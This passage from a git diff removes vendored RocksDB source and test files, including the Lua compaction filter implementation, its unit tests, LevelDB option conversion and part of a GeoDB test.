-    GeoDBOptions geodb_options;
-    EXPECT_OK(DestroyDB(kDefaultDbName, options));
-    options.create_if_missing = true;
-    Status status = DB::Open(options, kDefaultDbName, &db);
-    geodb =  new GeoDBImpl(db, geodb_options);
-  }
-
-  ~GeoDBTest() {
-    delete geodb;
-  }
-
-  GeoDB* getdb() {
-    return geodb;
-  }
-};
-
-const std::string GeoDBTest::kDefaultDbName = test::TmpDir() + "/geodb_test";
-Options GeoDBTest::options = Options();
-
-// Insert, Get and Remove
-TEST_F(GeoDBTest, SimpleTest) {
-  GeoPosition pos1(100, 101);
-  std::string id1("id1");
-  std::string value1("value1");
-
-  // insert first object into database
-  GeoObject obj1(pos1, id1, value1);
-  Status status = getdb()->Insert(obj1);
-  ASSERT_TRUE(status.ok());
-
-  // insert second object into database
-  GeoPosition pos2(200, 201);
-  std::string id2("id2");
-  std::string value2 = "value2";
-  GeoObject obj2(pos2, id2, value2);
-  status = getdb()->Insert(obj2);
-  ASSERT_TRUE(status.ok());
-
-  // retrieve first object using position
-  std::string value;
-  status = getdb()->GetByPosition(pos1, Slice(id1), &value);
-  ASSERT_TRUE(status.ok());
-  ASSERT_EQ(value, value1);
-
-  // retrieve first object using id
-  GeoObject obj;
-  status = getdb()->GetById(Slice(id1), &obj);
-  ASSERT_TRUE(status.ok());
-  ASSERT_EQ(obj.position.latitude, 100);
-  ASSERT_EQ(obj.position.longitude, 101);
-  ASSERT_EQ(obj.id.compare(id1), 0);
-  ASSERT_EQ(obj.value, value1);
-
-  // delete first object
-  status = getdb()->Remove(Slice(id1));
-  ASSERT_TRUE(status.ok());
-  status = getdb()->GetByPosition(pos1, Slice(id1), &value);
-  ASSERT_TRUE(status.IsNotFound());
-  status = getdb()->GetById(id1, &obj);
-  ASSERT_TRUE(status.IsNotFound());
-
-  // check that we can still find second object
-  status = getdb()->GetByPosition(pos2, id2, &value);
-  ASSERT_TRUE(status.ok());
-  ASSERT_EQ(value, value2);
-  status = getdb()->GetById(id2, &obj);
-  ASSERT_TRUE(status.ok());
-}
-
-// Search.
-// Verify distances via http://www.stevemorse.org/nearest/distance.php
-TEST_F(GeoDBTest, Search) {
-  GeoPosition pos1(45, 45);
-  std::string id1("mid1");
-  std::string value1 = "midvalue1";
-
-  // insert object at 45 degree latitude
-  GeoObject obj1(pos1, id1, value1);
-  Status status = getdb()->Insert(obj1);
-  ASSERT_TRUE(status.ok());
-
-  // search all objects centered at 46 degree latitude with
-  // a radius of 200 kilometers. We should find the one object that
-  // we inserted earlier.
-  GeoIterator* iter1 = getdb()->SearchRadial(GeoPosition(46, 46), 200000);
-  ASSERT_TRUE(status.ok());
-  ASSERT_EQ(iter1->geo_object().value, "midvalue1");
-  uint32_t size = 0;
-  while (iter1->Valid()) {
-    size++;
-    iter1->Next();
-  }
-  ASSERT_EQ(size, 1U);
-  delete iter1;
-
-  // search all objects centered at 46 degree latitude with
-  // a radius of 2 kilometers. There should be none.
-  GeoIterator* iter2 = getdb()->SearchRadial(GeoPosition(46, 46), 2);
-  ASSERT_TRUE(status.ok());
-  ASSERT_FALSE(iter2->Valid());
-  delete iter2;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char* argv[]) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-#else
-
-#include <stdio.h>
-
-int main() {
-  fprintf(stderr, "SKIPPED\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/leveldb_options/leveldb_options.cc b/thirdparty/rocksdb/utilities/leveldb_options/leveldb_options.cc
deleted file mode 100644
index 977585f..0000000
--- a/thirdparty/rocksdb/utilities/leveldb_options/leveldb_options.cc
+++ /dev/null
@@ -1,56 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/utilities/leveldb_options.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-
-namespace rocksdb {
-
-LevelDBOptions::LevelDBOptions()
-    : comparator(BytewiseComparator()),
-      create_if_missing(false),
-      error_if_exists(false),
-      paranoid_checks(false),
-      env(Env::Default()),
-      info_log(nullptr),
-      write_buffer_size(4 << 20),
-      max_open_files(1000),
-      block_cache(nullptr),
-      block_size(4096),
-      block_restart_interval(16),
-      compression(kSnappyCompression),
-      filter_policy(nullptr) {}
-
-Options ConvertOptions(const LevelDBOptions& leveldb_options) {
-  Options options = Options();
-  options.create_if_missing = leveldb_options.create_if_missing;
-  options.error_if_exists = leveldb_options.error_if_exists;
-  options.paranoid_checks = leveldb_options.paranoid_checks;
-  options.env = leveldb_options.env;
-  options.info_log.reset(leveldb_options.info_log);
-  options.write_buffer_size = leveldb_options.write_buffer_size;
-  options.max_open_files = leveldb_options.max_open_files;
-  options.compression = leveldb_options.compression;
-
-  BlockBasedTableOptions table_options;
-  table_options.block_cache.reset(leveldb_options.block_cache);
-  table_options.block_size = leveldb_options.block_size;
-  table_options.block_restart_interval = leveldb_options.block_restart_interval;
-  table_options.filter_policy.reset(leveldb_options.filter_policy);
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  return options;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/lua/rocks_lua_compaction_filter.cc b/thirdparty/rocksdb/utilities/lua/rocks_lua_compaction_filter.cc
deleted file mode 100644
index 0934ca9..0000000
--- a/thirdparty/rocksdb/utilities/lua/rocks_lua_compaction_filter.cc
+++ /dev/null
@@ -1,242 +0,0 @@
-//  Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#if defined(LUA) && !defined(ROCKSDB_LITE)
-#include "rocksdb/utilities/lua/rocks_lua_compaction_filter.h"
-
-extern "C" {
-#include <luaconf.h>
-}
-
-#include "rocksdb/compaction_filter.h"
-
-namespace rocksdb {
-namespace lua {
-
-const std::string kFilterFunctionName = "Filter";
-const std::string kNameFunctionName = "Name";
-
-void RocksLuaCompactionFilter::LogLuaError(const char* format, ...) const {
-  if (options_.error_log.get() != nullptr &&
-      error_count_ < options_.error_limit_per_filter) {
-    error_count_++;
-
-    va_list ap;
-    va_start(ap, format);
-    options_.error_log->Logv(InfoLogLevel::ERROR_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-bool RocksLuaCompactionFilter::Filter(int level, const Slice& key,
-                                      const Slice& existing_value,
-                                      std::string* new_value,
-                                      bool* value_changed) const {
-  auto* lua_state = lua_state_wrapper_.GetLuaState();
-  // push the right function into the lua stack
-  lua_getglobal(lua_state, kFilterFunctionName.c_str());
-
-  int error_no = 0;
-  int num_input_values;
-  int num_return_values;
-  if (options_.ignore_value == false) {
-    // push input arguments into the lua stack
-    lua_pushnumber(lua_state, level);
-    lua_pushlstring(lua_state, key.data(), key.size());
-    lua_pushlstring(lua_state, existing_value.data(), existing_value.size());
-    num_input_values = 3;
-    num_return_values = 3;
-  } else {
-    // If ignore_value is set to true, then we only put two arguments
-    // and expect one return value
-    lua_pushnumber(lua_state, level);
-    lua_pushlstring(lua_state, key.data(), key.size());
-    num_input_values = 2;
-    num_return_values = 1;
-  }
-
-  // perform the lua call
-  if ((error_no =
-           lua_pcall(lua_state, num_input_values, num_return_values, 0)) != 0) {
-    LogLuaError("[Lua] Error(%d) in Filter function --- %s", error_no,
-                lua_tostring(lua_state, -1));
-    // pops out the lua error from stack
-    lua_pop(lua_state, 1);
-    return false;
-  }
-
-  // As lua_pcall went successfully, it can be guaranteed that the top
-  // three elements in the Lua stack are the three returned values.
-
-  bool has_error = false;
-  const int kIndexIsFiltered = -num_return_values;
-  const int kIndexValueChanged = -num_return_values + 1;
-  const int kIndexNewValue = -num_return_values + 2;
-
-  // check the types of three return values
-  // is_filtered
-  if (!lua_isboolean(lua_state, kIndexIsFiltered)) {
-    LogLuaError(
-        "[Lua] Error in Filter function -- "
-        "1st return value (is_filtered) is not a boolean "
-        "while a boolean is expected.");
-    has_error = true;
-  }
-
-  if (options_.ignore_value == false) {
-    // value_changed
-    if (!lua_isboolean(lua_state, kIndexValueChanged)) {
-      LogLuaError(
-          "[Lua] Error in Filter function -- "
-          "2nd return value (value_changed) is not a boolean "
-          "while a boolean is expected.");
-      has_error = true;
-    }
-    // new_value
-    if (!lua_isstring(lua_state, kIndexNewValue)) {
-      LogLuaError(
-          "[Lua] Error in Filter function -- "
-          "3rd return value (new_value) is not a string "
-          "while a string is expected.");
-      has_error = true;
-    }
-  }
-
-  if (has_error) {
-    lua_pop(lua_state, num_return_values);
-    return false;
-  }
-
-  // Fetch the return values
-  bool is_filtered = false;
-  if (!has_error) {
-    is_filtered = lua_toboolean(lua_state, kIndexIsFiltered);
-    if (options_.ignore_value == false) {
-      *value_changed = lua_toboolean(lua_state, kIndexValueChanged);
-      if (*value_changed) {
-        const char* new_value_buf = lua_tostring(lua_state, kIndexNewValue);
-        const size_t new_value_size = lua_strlen(lua_state, kIndexNewValue);
-        // Note that any string that lua_tostring returns always has a zero at
-        // its end, bu/t it can have other zeros inside it
-        assert(new_value_buf[new_value_size] == '\0');
-        assert(strlen(new_value_buf) <= new_value_size);
-        new_value->assign(new_value_buf, new_value_size);
-      }
-    } else {
-      *value_changed = false;
-    }
-  }
-  // pops the three return values.
-  lua_pop(lua_state, num_return_values);
-  return is_filtered;
-}
-
-const char* RocksLuaCompactionFilter::Name() const {
-  if (name_ != "") {
-    return name_.c_str();
-  }
-  auto* lua_state = lua_state_wrapper_.GetLuaState();
-  // push the right function into the lua stack
-  lua_getglobal(lua_state, kNameFunctionName.c_str());
-
-  // perform the call (0 arguments, 1 result)
-  int error_no;
-  if ((error_no = lua_pcall(lua_state, 0, 1, 0)) != 0) {
-    LogLuaError("[Lua] Error(%d) in Name function --- %s", error_no,
-                lua_tostring(lua_state, -1));
-    // pops out the lua error from stack
-    lua_pop(lua_state, 1);
-    return name_.c_str();
-  }
-
-  // check the return value
-  if (!lua_isstring(lua_state, -1)) {
-    LogLuaError(
-        "[Lua] Error in Name function -- "
-        "return value is not a string while string is expected");
-  } else {
-    const char* name_buf = lua_tostring(lua_state, -1);
-    const size_t name_size __attribute__((unused)) = lua_strlen(lua_state, -1);
-    assert(name_buf[name_size] == '\0');
-    assert(strlen(name_buf) <= name_size);
-    name_ = name_buf;
-  }
-  lua_pop(lua_state, 1);
-  return name_.c_str();
-}
-
-/* Not yet supported
-bool RocksLuaCompactionFilter::FilterMergeOperand(
-    int level, const Slice& key, const Slice& operand) const {
-  auto* lua_state = lua_state_wrapper_.GetLuaState();
-  // push the right function into the lua stack
-  lua_getglobal(lua_state, "FilterMergeOperand");
-
-  // push input arguments into the lua stack
-  lua_pushnumber(lua_state, level);
-  lua_pushlstring(lua_state, key.data(), key.size());
-  lua_pushlstring(lua_state, operand.data(), operand.size());
-
-  // perform the call (3 arguments, 1 result)
-  int error_no;
-  if ((error_no = lua_pcall(lua_state, 3, 1, 0)) != 0) {
-    LogLuaError("[Lua] Error(%d) in FilterMergeOperand function --- %s",
-        error_no, lua_tostring(lua_state, -1));
-    // pops out the lua error from stack
-    lua_pop(lua_state, 1);
-    return false;
-  }
-
-  bool is_filtered = false;
-  // check the return value
-  if (!lua_isboolean(lua_state, -1)) {
-    LogLuaError("[Lua] Error in FilterMergeOperand function -- "
-                "return value is not a boolean while boolean is expected");
-  } else {
-    is_filtered = lua_toboolean(lua_state, -1);
-  }
-
-  lua_pop(lua_state, 1);
-
-  return is_filtered;
-}
-*/
-
-bool RocksLuaCompactionFilter::IgnoreSnapshots() const {
-  return options_.ignore_snapshots;
-}
-
-RocksLuaCompactionFilterFactory::RocksLuaCompactionFilterFactory(
-    const RocksLuaCompactionFilterOptions opt)
-    : opt_(opt) {
-  auto filter = CreateCompactionFilter(CompactionFilter::Context());
-  name_ = std::string("RocksLuaCompactionFilterFactory::") +
-          std::string(filter->Name());
-}
-
-std::unique_ptr<CompactionFilter>
-RocksLuaCompactionFilterFactory::CreateCompactionFilter(
-    const CompactionFilter::Context& context) {
-  std::lock_guard<std::mutex> lock(opt_mutex_);
-  return std::unique_ptr<CompactionFilter>(new RocksLuaCompactionFilter(opt_));
-}
-
-std::string RocksLuaCompactionFilterFactory::GetScript() {
-  std::lock_guard<std::mutex> lock(opt_mutex_);
-  return opt_.lua_script;
-}
-
-void RocksLuaCompactionFilterFactory::SetScript(const std::string& new_script) {
-  std::lock_guard<std::mutex> lock(opt_mutex_);
-  opt_.lua_script = new_script;
-}
-
-const char* RocksLuaCompactionFilterFactory::Name() const {
-  return name_.c_str();
-}
-
-}  // namespace lua
-}  // namespace rocksdb
-#endif  // defined(LUA) && !defined(ROCKSDB_LITE)
diff --git a/thirdparty/rocksdb/utilities/lua/rocks_lua_test.cc b/thirdparty/rocksdb/utilities/lua/rocks_lua_test.cc
deleted file mode 100644
index 025acaf..0000000
--- a/thirdparty/rocksdb/utilities/lua/rocks_lua_test.cc
+++ /dev/null
@@ -1,498 +0,0 @@
-//  Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <stdio.h>
-
-#if !defined(ROCKSDB_LITE)
-
-#if defined(LUA)
-
-#include <string>
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/lua/rocks_lua_compaction_filter.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class StopOnErrorLogger : public Logger {
- public:
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {
-    vfprintf(stderr, format, ap);
-    fprintf(stderr, "\n");
-    FAIL();
-  }
-};
-
-
-class RocksLuaTest : public testing::Test {
- public:
-  RocksLuaTest() : rnd_(301) {
-    temp_dir_ = test::TmpDir(Env::Default());
-    db_ = nullptr;
-  }
-
-  std::string RandomString(int len) {
-    std::string res;
-    for (int i = 0; i < len; ++i) {
-      res += rnd_.Uniform(26) + 'a';
-    }
-    return res;
-  }
-
-  void CreateDBWithLuaCompactionFilter(
-      const lua::RocksLuaCompactionFilterOptions& lua_opt,
-      const std::string& db_path,
-      std::unordered_map<std::string, std::string>* kvs,
-      const int kNumFlushes = 5,
-      std::shared_ptr<rocksdb::lua::RocksLuaCompactionFilterFactory>*
-          output_factory = nullptr) {
-    const int kKeySize = 10;
-    const int kValueSize = 50;
-    const int kKeysPerFlush = 2;
-    auto factory =
-        std::make_shared<rocksdb::lua::RocksLuaCompactionFilterFactory>(
-            lua_opt);
-    if (output_factory != nullptr) {
-      *output_factory = factory;
-    }
-
-    options_ = Options();
-    options_.create_if_missing = true;
-    options_.compaction_filter_factory = factory;
-    options_.disable_auto_compactions = true;
-    options_.max_bytes_for_level_base =
-        (kKeySize + kValueSize) * kKeysPerFlush * 2;
-    options_.max_bytes_for_level_multiplier = 2;
-    options_.target_file_size_base = (kKeySize + kValueSize) * kKeysPerFlush;
-    options_.level0_file_num_compaction_trigger = 2;
-    DestroyDB(db_path, options_);
-    ASSERT_OK(DB::Open(options_, db_path, &db_));
-
-    for (int f = 0; f < kNumFlushes; ++f) {
-      for (int i = 0; i < kKeysPerFlush; ++i) {
-        std::string key = RandomString(kKeySize);
-        std::string value = RandomString(kValueSize);
-        kvs->insert({key, value});
-        ASSERT_OK(db_->Put(WriteOptions(), key, value));
-      }
-      db_->Flush(FlushOptions());
-    }
-  }
-
-  ~RocksLuaTest() {
-    if (db_) {
-      delete db_;
-    }
-  }
-  std::string temp_dir_;
-  DB* db_;
-  Random rnd_;
-  Options options_;
-};
-
-TEST_F(RocksLuaTest, Default) {
-  // If nothing is set in the LuaCompactionFilterOptions, then
-  // RocksDB will keep all the key / value pairs, but it will also
-  // print our error log indicating failure.
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-
-  std::unordered_map<std::string, std::string> kvs;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs);
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    ASSERT_OK(db_->Get(ReadOptions(), entry.first, &value));
-    ASSERT_EQ(value, entry.second);
-  }
-}
-
-TEST_F(RocksLuaTest, KeepsAll) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  // keeps all the key value pairs
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  return false, false, \"\"\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"KeepsAll\"\n"
-      "end\n"
-      "\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs);
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    ASSERT_OK(db_->Get(ReadOptions(), entry.first, &value));
-    ASSERT_EQ(value, entry.second);
-  }
-}
-
-TEST_F(RocksLuaTest, GetName) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  const std::string kScriptName = "SimpleLuaCompactionFilter";
-  lua_opt.lua_script =
-      std::string(
-          "function Filter(level, key, existing_value)\n"
-          "  return false, false, \"\"\n"
-          "end\n"
-          "\n"
-          "function FilterMergeOperand(level, key, operand)\n"
-          "  return false\n"
-          "end\n"
-          "function Name()\n"
-          "  return \"") + kScriptName + "\"\n"
-      "end\n"
-      "\n";
-
-  std::shared_ptr<CompactionFilterFactory> factory =
-      std::make_shared<lua::RocksLuaCompactionFilterFactory>(lua_opt);
-  std::string factory_name(factory->Name());
-  ASSERT_NE(factory_name.find(kScriptName), std::string::npos);
-}
-
-TEST_F(RocksLuaTest, RemovesAll) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  // removes all the key value pairs
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  return true, false, \"\"\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"RemovesAll\"\n"
-      "end\n"
-      "\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs);
-  // Issue full compaction and expect nothing is in the DB.
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    auto s = db_->Get(ReadOptions(), entry.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-}
-
-TEST_F(RocksLuaTest, FilterByKey) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  // removes all keys whose initial is less than 'r'
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  if key:sub(1,1) < 'r' then\n"
-      "    return true, false, \"\"\n"
-      "  end\n"
-      "  return false, false, \"\"\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"KeepsAll\"\n"
-      "end\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs);
-  // Issue full compaction and expect nothing is in the DB.
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    auto s = db_->Get(ReadOptions(), entry.first, &value);
-    if (entry.first[0] < 'r') {
-      ASSERT_TRUE(s.IsNotFound());
-    } else {
-      ASSERT_TRUE(s.ok());
-      ASSERT_TRUE(value == entry.second);
-    }
-  }
-}
-
-TEST_F(RocksLuaTest, FilterByValue) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  // removes all values whose initial is less than 'r'
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  if existing_value:sub(1,1) < 'r' then\n"
-      "    return true, false, \"\"\n"
-      "  end\n"
-      "  return false, false, \"\"\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"FilterByValue\"\n"
-      "end\n"
-      "\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs);
-  // Issue full compaction and expect nothing is in the DB.
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    auto s = db_->Get(ReadOptions(), entry.first, &value);
-    if (entry.second[0] < 'r') {
-      ASSERT_TRUE(s.IsNotFound());
-    } else {
-      ASSERT_TRUE(s.ok());
-      ASSERT_EQ(value, entry.second);
-    }
-  }
-}
-
-TEST_F(RocksLuaTest, ChangeValue) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  // Replace all values by their reversed key
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  return false, true, key:reverse()\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"ChangeValue\"\n"
-      "end\n"
-      "\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs);
-  // Issue full compaction and expect nothing is in the DB.
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    ASSERT_OK(db_->Get(ReadOptions(), entry.first, &value));
-    std::string new_value = entry.first;
-    std::reverse(new_value.begin(), new_value.end());
-    ASSERT_EQ(value, new_value);
-  }
-}
-
-TEST_F(RocksLuaTest, ConditionallyChangeAndFilterValue) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  // Performs the following logic:
-  // If key[0] < 'h' --> replace value by reverse key
-  // If key[0] >= 'r' --> keep the original key value
-  // Otherwise, filter the key value
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  if key:sub(1,1) < 'h' then\n"
-      "    return false, true, key:reverse()\n"
-      "  elseif key:sub(1,1) < 'r' then\n"
-      "    return true, false, \"\"\n"
-      "  end\n"
-      "  return false, false, \"\"\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"ConditionallyChangeAndFilterValue\"\n"
-      "end\n"
-      "\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs);
-  // Issue full compaction and expect nothing is in the DB.
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    auto s = db_->Get(ReadOptions(), entry.first, &value);
-    if (entry.first[0] < 'h') {
-      ASSERT_TRUE(s.ok());
-      std::string new_value = entry.first;
-      std::reverse(new_value.begin(), new_value.end());
-      ASSERT_EQ(value, new_value);
-    } else if (entry.first[0] < 'r') {
-      ASSERT_TRUE(s.IsNotFound());
-    } else {
-      ASSERT_TRUE(s.ok());
-      ASSERT_EQ(value, entry.second);
-    }
-  }
-}
-
-TEST_F(RocksLuaTest, DynamicChangeScript) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  lua_opt.error_log = std::make_shared<StopOnErrorLogger>();
-  // keeps all the key value pairs
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  return false, false, \"\"\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"KeepsAll\"\n"
-      "end\n"
-      "\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  std::shared_ptr<rocksdb::lua::RocksLuaCompactionFilterFactory> factory;
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs, 30, &factory);
-  uint64_t count = 0;
-  ASSERT_TRUE(db_->GetIntProperty(
-      rocksdb::DB::Properties::kNumEntriesActiveMemTable, &count));
-  ASSERT_EQ(count, 0);
-  ASSERT_TRUE(db_->GetIntProperty(
-      rocksdb::DB::Properties::kNumEntriesImmMemTables, &count));
-  ASSERT_EQ(count, 0);
-
-  CompactRangeOptions cr_opt;
-  cr_opt.bottommost_level_compaction =
-      rocksdb::BottommostLevelCompaction::kForce;
-
-  // Issue full compaction and expect everything is in the DB.
-  ASSERT_OK(db_->CompactRange(cr_opt, nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    ASSERT_OK(db_->Get(ReadOptions(), entry.first, &value));
-    ASSERT_EQ(value, entry.second);
-  }
-
-  // change the lua script to removes all the key value pairs
-  factory->SetScript(
-      "function Filter(level, key, existing_value)\n"
-      "  return true, false, \"\"\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"RemovesAll\"\n"
-      "end\n"
-      "\n");
-  {
-    std::string key = "another-key";
-    std::string value = "another-value";
-    kvs.insert({key, value});
-    ASSERT_OK(db_->Put(WriteOptions(), key, value));
-    db_->Flush(FlushOptions());
-  }
-
-  cr_opt.change_level = true;
-  cr_opt.target_level = 5;
-  // Issue full compaction and expect nothing is in the DB.
-  ASSERT_OK(db_->CompactRange(cr_opt, nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    auto s = db_->Get(ReadOptions(), entry.first, &value);
-    ASSERT_TRUE(s.IsNotFound());
-  }
-}
-
-TEST_F(RocksLuaTest, LuaConditionalTypeError) {
-  std::string db_path = temp_dir_ + "/rocks_lua_test";
-
-  lua::RocksLuaCompactionFilterOptions lua_opt;
-  // Filter() error when input key's initial >= 'r'
-  lua_opt.lua_script =
-      "function Filter(level, key, existing_value)\n"
-      "  if existing_value:sub(1,1) >= 'r' then\n"
-      "    return true, 2, \"\" -- incorrect type of 2nd return value\n"
-      "  end\n"
-      "  return true, false, \"\"\n"
-      "end\n"
-      "\n"
-      "function FilterMergeOperand(level, key, operand)\n"
-      "  return false\n"
-      "end\n"
-      "function Name()\n"
-      "  return \"BuggyCode\"\n"
-      "end\n"
-      "\n";
-
-  std::unordered_map<std::string, std::string> kvs;
-  // Create DB with 10 files
-  CreateDBWithLuaCompactionFilter(lua_opt, db_path, &kvs, 10);
-
-  // Issue full compaction and expect all keys which initial is < 'r'
-  // will be deleted as we keep the key value when we hit an error.
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-  for (auto const& entry : kvs) {
-    std::string value;
-    auto s = db_->Get(ReadOptions(), entry.first, &value);
-    if (entry.second[0] < 'r') {
-      ASSERT_TRUE(s.IsNotFound());
-    } else {
-      ASSERT_TRUE(s.ok());
-      ASSERT_EQ(value, entry.second);
-    }
-  }
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-
-int main(int argc, char** argv) {
-  printf("LUA_PATH is not set.  Ignoring the test.\n");
-}
-
-#endif  // defined(LUA)
-
-#else
-
-int main(int argc, char** argv) {
-  printf("Lua is not supported in RocksDBLite.  Ignoring the test.\n");
-}
-
-#endif  // !defined(ROCKSDB_LITE)
diff --git a/thirdparty/rocksdb/utilities/memory/memory_test.cc b/thirdparty/rocksdb/utilities/memory/memory_test.cc
deleted file mode 100644
index ee4f874..0000000
--- a/thirdparty/rocksdb/utilities/memory/memory_test.cc
+++ /dev/null
@@ -1,276 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "db/db_impl.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/table.h"
-#include "rocksdb/utilities/memory_util.h"
-#include "rocksdb/utilities/stackable_db.h"
-#include "table/block_based_table_factory.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class MemoryTest : public testing::Test {
- public:
